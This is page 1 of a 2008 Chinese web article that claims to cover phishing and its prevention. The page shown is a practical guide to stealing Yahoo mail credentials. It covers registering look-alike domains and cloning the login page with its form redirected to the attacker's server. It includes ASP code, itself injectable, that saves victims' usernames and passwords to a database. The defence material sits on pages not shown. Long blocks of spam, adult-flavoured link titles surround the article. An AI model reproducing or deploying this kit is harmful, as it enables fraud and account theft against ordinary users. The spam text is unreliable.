国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

詳解網絡釣魚的實現與防范技巧(1)
2008-10-29   

網絡釣魚因其嚴重危害網民利益和互聯網信譽體制,越來越多地受到人們的關注,國際上已經成立反網絡釣魚工作小組(APWG,Anti-Phishing Working Group),這是一個聯合機構,擁有大約800名成員,他們來自約490家金融服務公司、技術公司、服務提供商、國家法律執行機構和立法機構,這些機構的職責是向產業股份持有人提供一個保密論壇以討論網絡釣魚問題。反網絡釣魚工作小組通過召開會議以及成員之間的電子形式的討論,努力從硬成本和軟成本兩個方面來定義網絡釣魚的范圍,分享信息和最佳操作模式以消除存在的問題,希望在不久的將來,徹底消滅網絡釣魚陷阱,還給大家一個真誠、誠信的互聯網。

一. 釣魚的原理:

網絡釣魚(Phishing)一詞,是“Fishing”和“Phone”的綜合體,由于黑客始祖起初是以電話作案,所以用“Ph”來取代“F”,創造了”Phishing”,Phishing 發音與 Fishing相同。 “網絡釣魚”就其本身來說,稱不上是一種獨立的攻擊手段,更多的只是詐騙方法,就像現實社會中的一些詐騙一樣。攻擊者利用欺騙性的電子郵件和偽造的Web站點來進行詐騙活動,誘騙訪問者提供一些個人信息,如信用卡號、賬戶用和口令、社保編號等內容(通常主要是那些和財務,賬號有關的信息,以獲取不正當利益),受騙者往往會泄露自己的財務數據。

現在網絡釣魚的技術手段越來越復雜,比如隱藏在圖片中的惡意代碼、鍵盤記錄程序,當然還有和合法網站外觀完全一樣的虛假網站,這些虛假網站甚至連瀏覽器下方的鎖形安全標記都能顯示出來。網絡釣魚的手段越來越狡猾,這里首先介紹一下網絡釣魚的工作流程。通常有五個階段:

 
圖1

1. 釣魚者入侵初級服務器,竊取用戶的名字和郵件地址

2. 釣魚者發送有針對性質的郵件3. 受害用戶訪問假冒網址

4. 受害用戶提供秘密和用戶信息被釣魚者取得

5. 釣魚者使用受害用戶的身份進入其他網絡服務器

關于惡意垃圾郵件,想必大家都很了解了,這里我們要實現和操作的是第三種,偽造目標網站,使目標用戶訪問假冒網站,從而完成我們的欺騙。

二. 實現方法

下面我們實現一個簡單的網頁釣魚頁面,大家可以根據自己的需要添加和修改。

1.首先我們申請一個空間,在空間上用來存放我們的網頁

2.我們再申請一個域名,為了達到欺騙效果,我們可以申請一些名字和我們要欺騙的網站類似的域名:如: www.yahoo.com  我們申請一個 www.yaho.com

如果不能申請這些頂級域名的話,我們也可以修改我們的二級域名

如:我們自己的域名是tcbmail.com,我們可以添加一個yahoo.tcbmail.com的二級域名,這樣可以增加欺騙的成功率

將我們的空間地址綁定到我們的域名上

3.選取目標,修改代碼。

下面我們看一下我們要欺騙的目標,這里我們以yahoo為例,其他網站我們也可以采取類似辦法

打開yahoo郵件的主頁:https://login.yahoo.com/config/mail?.intl=us 

 
圖2

查看其原代碼,我們看到這樣一句話

https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return

hash2(this)">

這句話的意思就是將我們輸入的表單項的值提交到后臺的處理網頁https://login.yahoo.com/config/login?呵呵,這里就給我們提供了機會,我們可以仿造一個yahoo的郵件的主頁,將提交后的頁面換成我們自己的頁面,通過后臺數據庫處理,就可以達到截獲目標帳戶密碼的效果。

下面我們就具體操作一下

將yahoo郵件的主頁保存到本地

P>https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

修改為

 {FORM method="post" action="http://我們自己 域名/test.asp"  target=_self}


保存為mail.html

4.編寫test.asp,使其完成將輸入的值存儲到我們對應的數據庫中,這里我們可以直接使用access數據庫利用以下代碼就可以完成我們的目的

<%
dim db,strcon,qq,pass,rs,strSql
qq=Request("username")
pass=Request("passwd")
strcon="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.mappath("pass.mdb")
Set db=Server.createobject("ADODB.connection")
db.open strcon
strSql="INSERT INTO name(name, pass) VALUES('"& qq &"','"& pass &"')" 
db.Execute(strSql)
%>

5.將編輯好的mail.html、test.asp以及我們編輯好的pass.mdb上傳到空間中

訪問http://我們自己的域名/mail.html

是不是就看到yahoo的郵箱主頁

當你輸入用戶名、密碼的時候,對應的輸入已經存儲到我們自己的數據庫pass.mdb中了,欺騙成功.

 
圖3

當然啦,現在大家的安全意識都比以前強了,如果大家留意我們所發的鏈接時,有些細心的朋友還是會注意到網頁和實際的不同

但是如果你的域名欺騙性比較大的話,你的成功性也會比較大

如:http://mail.yaho.com.cn/mail.html看起來是不是很像

或者添加一個二級域名

如:http://yahoo.duay.com/mail.html也可以起到一個不錯的欺騙效果

如果你申請的域名類似于www.tiger.com那我們該如何處理呢?

下面再簡單介紹幾種URL欺騙的方法


共3頁: 1 [2] [3] 下一頁
 第 1 頁:  第 2 頁:釣魚實現
 第 3 頁:釣魚防范

熱詞搜索:

上一篇:圖解如何防止黑客接管思科路由器(1)
下一篇:社會工程學在網絡攻擊中的應用與防范(1)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
在线电影院国产精品| 久久这里只有精品首页| 久久综合狠狠综合久久综合88| 免费av成人在线| 精品播放一区二区| 国产91丝袜在线观看| 国产精品久99| 在线一区二区三区| 美女性感视频久久| 中文字幕一区二区三区蜜月 | 欧美日韩国产影片| 久久99久久99精品免视看婷婷 | 91精品国产综合久久国产大片| 蜜桃精品在线观看| 亚洲丝袜自拍清纯另类| 欧美一级理论性理论a| 成人午夜看片网址| 人人爽香蕉精品| 亚洲天堂a在线| 欧美v亚洲v综合ⅴ国产v| www.日韩在线| 久草精品在线观看| 亚瑟在线精品视频| 国产精品国产a级| 欧美mv和日韩mv国产网站| 色哟哟国产精品免费观看| 国产精品18久久久| 日韩精品一二三四| 亚洲精品欧美二区三区中文字幕| 欧美肥妇bbw| 91久久国产综合久久| 丁香婷婷综合色啪| 国产在线乱码一区二区三区| 性久久久久久久| 亚洲柠檬福利资源导航| 久久久久久久综合色一本| 欧美美女一区二区在线观看| 成人成人成人在线视频| 国产一区欧美日韩| 精品一区免费av| 秋霞午夜鲁丝一区二区老狼| 亚洲女同ⅹxx女同tv| 国产精品青草综合久久久久99| 精品三级av在线| 91精品国产综合久久久蜜臀图片| 日本福利一区二区| 在线视频欧美区| 欧美午夜精品一区二区三区| a级精品国产片在线观看| 国产suv一区二区三区88区| 国产一区二区三区蝌蚪| 国产一区不卡精品| 国产精品99久| 成人性色生活片免费看爆迷你毛片| 国产一区二区三区视频在线播放| 色女孩综合影院| 不卡av在线网| va亚洲va日韩不卡在线观看| 成人精品国产福利| 大尺度一区二区| 9i在线看片成人免费| aaa国产一区| 91国偷自产一区二区开放时间| 欧美私模裸体表演在线观看| 欧美图区在线视频| 制服丝袜国产精品| 久久久久久电影| 国产精品久久久久一区二区三区| 国产精品乱码久久久久久| 国产精品嫩草99a| 亚洲精品国产视频| 五月天亚洲婷婷| 国模冰冰炮一区二区| 豆国产96在线|亚洲| 91捆绑美女网站| 欧美精品丝袜中出| 久久久国产综合精品女国产盗摄| 亚洲欧洲韩国日本视频| 亚洲v精品v日韩v欧美v专区 | 国产成人8x视频一区二区| av在线一区二区| 欧美日韩一区二区三区四区| 欧美mv和日韩mv的网站| 国产精品欧美综合在线| 亚洲一线二线三线久久久| 精品中文字幕一区二区| 99久久精品国产导航| 在线不卡中文字幕| 中文一区在线播放 | 午夜久久电影网| 国产麻豆精品在线| 一本大道久久精品懂色aⅴ| 日韩午夜激情电影| 《视频一区视频二区| 久久av资源站| 91国偷自产一区二区三区成为亚洲经典 | 日韩欧美一区在线| 亚洲人午夜精品天堂一二香蕉| 日韩在线一区二区| 成人免费高清视频| 日韩女优毛片在线| 成人高清免费观看| 欧美三级视频在线观看| 国产网站一区二区三区| 亚洲成va人在线观看| 成人激情图片网| 精品国产伦一区二区三区观看方式 | 亚洲第一av色| 成人a区在线观看| 精品成a人在线观看| 日韩激情在线观看| 欧美伊人久久久久久久久影院| 国产午夜亚洲精品不卡 | 日韩va亚洲va欧美va久久| 99re在线视频这里只有精品| 日韩女优电影在线观看| 天堂成人免费av电影一区| 91美女视频网站| 国产精品久久久久久久久果冻传媒 | 国产又黄又大久久| 日韩欧美一级二级| 日本在线不卡视频一二三区| 欧美日韩免费观看一区二区三区 | 美女一区二区视频| 在线播放中文字幕一区| 亚洲一区免费视频| 91高清视频免费看| 一区二区三区久久久| 99国产精品国产精品毛片| 国产精品成人在线观看| 99久久婷婷国产精品综合| 国产精品二三区| av在线播放不卡| 亚洲日本va在线观看| 一本大道久久a久久精品综合 | 一区二区视频免费在线观看| 91理论电影在线观看| 亚洲精品福利视频网站| 色一情一伦一子一伦一区| 一级做a爱片久久| 欧美日本不卡视频| 精品制服美女丁香| 国产精品毛片久久久久久| 99久久综合国产精品| 亚洲视频每日更新| 欧美日韩精品专区| 久色婷婷小香蕉久久| 国产日韩欧美精品在线| 99久久99久久免费精品蜜臀| 亚洲制服丝袜在线| 欧美一区日韩一区| 国产99久久久国产精品潘金网站| 国产精品丝袜久久久久久app| 91在线观看污| 日韩一区精品字幕| 国产欧美一区二区在线观看| 成人国产精品视频| 日韩精品三区四区| 一区二区视频在线| 91精品婷婷国产综合久久性色| 蜜桃一区二区三区四区| 中文一区二区在线观看| 欧美私模裸体表演在线观看| 国内精品不卡在线| 一区二区三区在线影院| 日韩欧美在线一区二区三区| av电影一区二区| 精品一区二区成人精品| 亚洲欧美综合网| 精品国产一区二区三区忘忧草| 99久久精品免费精品国产| 青草国产精品久久久久久| 国产精品久久久爽爽爽麻豆色哟哟| 欧美三级日本三级少妇99| 国产不卡视频一区二区三区| 日韩高清在线观看| 国产精品国产三级国产有无不卡| 91精品国产品国语在线不卡| 不卡视频一二三| 国产自产高清不卡| 三级一区在线视频先锋| 日韩毛片高清在线播放| 久久一区二区三区四区| 欧美一区二区三区免费| 一本色道综合亚洲| 成人午夜免费视频| 国产高清在线精品| 美女网站一区二区| 午夜视频一区在线观看| 亚洲精品欧美二区三区中文字幕| 欧美极品另类videosde| 精品国产乱码久久久久久老虎| 欧美日韩一级二级| 色噜噜狠狠色综合中国| 成人性色生活片免费看爆迷你毛片| 久久国内精品自在自线400部| 亚洲影视资源网| 亚洲综合一区二区精品导航| 国产精品色哟哟网站| 国产精品你懂的在线|